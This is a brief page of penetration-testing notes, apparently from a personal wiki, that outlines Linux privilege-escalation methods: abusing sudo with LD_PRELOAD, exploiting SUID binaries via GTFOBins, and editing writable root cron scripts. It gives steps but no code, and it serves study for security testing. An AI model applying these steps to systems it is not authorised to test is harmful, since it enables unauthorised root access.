Linux Privesc Techniques

Some basic vulnerability explanations

Kernel Exploits

Sudo

  • Leverage LD_PRELOAD

    • Check for LD_PRELOAD (with the env_keep option)

    • Write a simple C code compiled as a share object (.so extension) file

    • Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

  • Leverage application function

If you have sudo rights to run a program see this -> https://gtfobins.github.io/

SUID

SUID -> set user ID

  • SUID bit allows users to run executable files with the same permissions as the owner of that file

  • Find files that are SUID bit.

  • Search on gtfobins for exploit a SUID file

See https://www.stationx.net/linux-file-permissions-cheat-sheet/ for more info about file permissions

Cron Jobs

Cronjobs -> scheduled tasks

  • Identify the active jobs.

  • Check if there’s a scheduled task that runs with root privileges or any other user.

  • Change the script that will be run & gain that jobs owner privileges. (we can change if that script has write,execute perm or not full path defined loopholes etc).

PreviousLinux EnumerationNextTricks

Last updated